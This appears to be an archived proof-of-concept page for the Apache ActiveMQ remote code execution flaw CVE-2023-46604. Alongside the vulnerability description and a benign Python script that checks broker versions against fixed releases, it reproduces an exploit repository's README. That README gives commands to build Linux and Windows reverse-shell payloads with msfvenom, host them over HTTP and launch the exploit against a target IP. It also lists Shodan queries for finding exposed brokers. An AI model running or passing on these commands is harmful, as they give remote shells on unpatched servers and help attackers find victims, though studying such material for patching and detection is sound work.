POC details: ca0234639260e611149db2c67b82b9d482cda75f

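Source
Related vulnerability
Title: Apache ActiveMQ code issue vulnerability (CVE-2023-46604)
Description: Apache ActiveMQ is an open-source message broker from the Apache Software Foundation (US) that supports Java Message Service, clustering, the Spring Framework, and more. Apache ActiveMQ versions before 5.15.16, before 5.16.7, before 5.17.6, or before 5.18.3 contain a code issue vulnerability, which stems from allowing a remote attacker with network access to the broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol.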
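For patch triage, the affected ranges in the description above can be checked against a broker inventory. This is an added example, not code from the repository or from Apache; the host names and inventory are constructed, and releases newer than the 5.18 branch are assumed unaffected because the description lists none.

```python
import re

# First fixed patch level per branch, taken from the description above.
FIXED_PATCH = {(5, 15): 16, (5, 16): 7, (5, 17): 6, (5, 18): 3}
# Anything on a branch older than 5.15 falls under "before 5.15.16".
OLDEST_FIXED = (5, 15, 16)

def parse_version(text):
    """Return (major, minor, patch). A suffix such as -SNAPSHOT is ignored,
    so a pre-release build of a fixed version is assumed to carry the fix."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if m is None:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(part) for part in m.groups())

def minimum_fixed(version):
    """Return the first fixed release to upgrade to, or None if not affected."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED_PATCH:
        fixed = branch + (FIXED_PATCH[branch],)
        return fixed if v < fixed else None
    # Assumption: branches newer than 5.18 are not listed, so treated as fixed.
    return OLDEST_FIXED if v < OLDEST_FIXED else None

def is_affected(version):
    return minimum_fixed(version) is not None

def audit(inventory):
    """Map each affected host to the minimum fixed release for its branch."""
    findings = {}
    for host, version in inventory.items():
        fixed = minimum_fixed(version)
        if fixed is not None:
            findings[host] = ".".join(str(n) for n in fixed)
    return findings

# Constructed inventory (hypothetical hosts), e.g. exported from a CMDB.
SAMPLE_INVENTORY = {
    "mq-a.example.internal": "5.18.2",
    "mq-b.example.internal": "5.15.16",
    "mq-c.example.internal": "5.14.5",
    "mq-d.example.internal": "5.17.6",
    "mq-e.example.internal": "6.0.0",
}

if __name__ == "__main__":
    for host, target in sorted(audit(SAMPLE_INVENTORY).items()):
        print(f"{host}: affected, upgrade to at least {target}")
```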
Description
Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE-2023-46604)
Introduction
# CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).

# Usage:
<b>Important: Manually change the IP address (0.0.0.0 on line 11) in the XML files to the IP address where the payload will be generated. If you follow the commands below, it will be your listener IP address. {IP_Of_Hosted_XML_File} will also be your listener IP address.</b>

For Linux/Unix Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
```

For Windows Targets
```
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml
```

![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/db1b82e4-55ef-4f23-9df7-8a0cf99c01c4)

# Shodan Dork:
- product:"ActiveMQ OpenWire Transport"
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/6d560881-7855-474b-8c8b-3fb5a3f09a94)
- product:"ActiveMQ OpenWire Transport" port:61616
- ![image](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/assets/66937297/1e073ec0-690e-40b1-bcc0-cb9390ca6b7c)



# Original Work:
- https://github.com/X1r0z/ActiveMQ-RCE

# For More Reading:
- https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
- https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

A special thanks to https://github.com/Anon4mous for actively supporting me.
File snapshot

```
[4.0K]  /data/pocs/ca0234639260e611149db2c67b82b9d482cda75f
├── [2.8M]  ActiveMQ-RCE.exe
├── [  29]  go.mod
├── [1.6K]  main.go
├── [ 716]  poc-linux.xml
├── [ 717]  poc-windows.xml
└── [2.3K]  README.md

0 directories, 6 files
```